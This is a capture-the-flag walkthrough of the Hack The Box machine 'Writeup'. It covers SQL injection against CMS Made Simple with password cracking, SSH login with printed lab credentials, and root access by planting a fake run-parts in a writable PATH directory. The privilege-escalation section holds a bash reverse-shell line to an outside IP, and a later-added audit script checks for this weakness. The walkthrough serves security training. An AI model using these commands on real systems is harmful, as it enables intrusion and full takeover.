Hack The Box – Writeup Box Walkthrough By Nikhil Sahoo


Introduction

Back with a new blog. Today we will walk through the Hack The Box machine Writeup, a Linux box that retired very recently. It was a slightly tricky box considering it is rated easy: getting the user flag was straightforward, but I got stuck for a while during the privilege escalation part. So, without further ado, let's begin...

Recon

We’ll start with our recon by doing an Nmap scan.

nmap -sC -sV 10.10.10.138


As we can see, port 80 is open, so let's check that first in our browser.


As you can see from the text above, a DoS protection script has been implemented, so we won't be fuzzing for directories and files here.

Heading back to our Nmap scan, we can clearly see a disallowed entry in the robots.txt file named /writeup/. Let's navigate to that page.

Let's check its source code to see if we can get any hint from there.


OK, so it looks like the page is built with the CMS Made Simple framework.


Exploitation

Going back to our terminal, let's search for any available exploits using searchsploit:

searchsploit "CMS made simple"


Looks like an SQL injection exploit is available; let's try it, as it affects all versions below 2.2.10. More details about this can be found here.

Before proceeding further, let's have a look at the exploit code.


As per the description, it is a time-based SQL injection, and the script also accepts a wordlist for password cracking, so let's run it with our favourite password wordlist, rockyou.txt:

python <path to exploit code> -u http://10.10.10.138/writeup/ --crack -w <path to password list>


So we successfully obtained the username and password:

username: jkr

password: raykayjay9

Now, if you remember, the SSH port (22) was open as well. Let's try the credentials above there. Type in the SSH command below to log in to the box:

ssh jkr@10.10.10.148

Enter the password from above; after logging in we should find our user flag in the current directory.


Privilege Escalation

Now let's start hunting for the root flag. We can begin by continuously monitoring the processes on the system with an excellent tool named pspy.

We can transfer it to the box either with scp or by hosting it on a web server of our own (python/apache) and downloading it from there. Let's run pspy now...


A lot of information is shown above, but let's focus on the PATH variable and the run-parts command running as UID 0 (root). For those who don't know, PATH is an environment variable on Linux and other Unix-like operating systems that tells the shell which directories to search for executable files when a user issues a command.

In simple words, to run an executable file we normally change to the directory it is in and run it as "./filename"; if we want to run that file from any directory just by typing "filename" without the "./", the directory containing it must be listed in the PATH variable. You can find more information here.

Let's check where run-parts lives by typing "which run-parts", and check the PATH variable by typing "echo $PATH".

So here’s what we got in the PATH variable:


The next step is to find all the writable directories on the box. Type in "find / -type d -writable 2>/dev/null".


It looks like the /usr/local/bin/ directory is writable and is also listed in the PATH variable. Because a command invoked by its bare name is looked up directory by directory in PATH order, we can place our own run-parts file containing a reverse shell in that directory; when the root process next runs run-parts, it will execute our file instead and hand us a reverse shell as root.
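The exposure above (a writable directory searched by PATH before the real run-parts) is something an administrator can audit with a few lines of shell. The script below is an added defensive check, not part of the original writeup or of pspy; it assumes POSIX sh with ls and cut, and takes the PATH string and command name as inputs.

```shell
# Added defensive audit, not part of the original writeup: walk a PATH string in
# search order and report whether a command (run-parts here) could be shadowed
# by a file planted in a group- or world-writable directory. Assumes POSIX sh
# with ls and cut; directory names containing spaces are not handled.

# Print every directory listed in $1 (colon-separated) that is group- or
# world-writable. An empty entry means the current directory and is checked too.
writable_path_dirs() {
    _old_ifs=$IFS; IFS=:; set -- $1; IFS=$_old_ifs
    for _d in "$@"; do
        [ -z "$_d" ] && _d=.
        [ -d "$_d" ] || continue
        # ls -ldL prints e.g. drwxrwxrwx: column 6 is group write, column 9 other write
        _perm=$(ls -ldL "$_d" | cut -c1-10)
        case $_perm in
            ?????w*|????????w*) printf '%s\n' "$_d" ;;
        esac
    done
}

# Return 0 and print the offending directory if $2 could be hijacked through
# PATH $1, i.e. a writable directory is searched before (or is) the directory
# that currently provides it. Return 1 once a non-writable directory holding $2
# is reached, because the shell never looks past the first match.
path_hijackable() {
    _path=$1; _cmd=$2
    _writable=$(writable_path_dirs "$_path")
    _old_ifs=$IFS; IFS=:; set -- $_path; IFS=$_old_ifs
    for _d in "$@"; do
        [ -z "$_d" ] && _d=.
        for _w in $_writable; do
            if [ "$_w" = "$_d" ]; then
                printf '%s\n' "$_d"
                return 0
            fi
        done
        [ -x "$_d/$_cmd" ] && return 1
    done
    return 1
}

# Audit the current shell's PATH. A root cron job or login hook may run with a
# different PATH, so also check the value pspy or the crontab shows.
if _hit=$(path_hijackable "$PATH" run-parts); then
    echo "run-parts can be shadowed from writable PATH entry: $_hit"
else
    echo "run-parts cannot be shadowed from this PATH"
fi
```

The fix on the defender's side is to make /usr/local/bin root-owned and not group- or world-writable, and to keep privileged jobs from depending on a PATH that includes user-writable directories.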

So, first things first, let's write our reverse shell into run-parts and place it in /usr/local/bin/ by typing in:

echo "/bin/bash -c bash -i >& /dev/tcp/10.10.15.171/1234 0>&1" > /usr/local/bin/run-parts

You can get a list of reverse shells from pentestmonkey.

Next, let's give the file execute permission:

chmod 777 /usr/local/bin/run-parts

Now let's move to our other terminal and start a netcat listener on our port:

nc -lnvp 1234


Now all we have to do is wait for our file to be executed automatically, which takes a couple of minutes depending on how busy the box is. If there is little traffic (especially on the VIP servers), you can simply open another terminal and start another SSH session by logging in again.

And after a couple of minutes, we got our reverse shell as root.


Let's move to root's home directory and view the root.txt file.


Thus we got our root flag, and the challenge is complete.

That's all for now. See you next time. Goodbye!

You can also have a look at my previous Hack The Box article, the Swagshop writeup. Here is the link to the article.
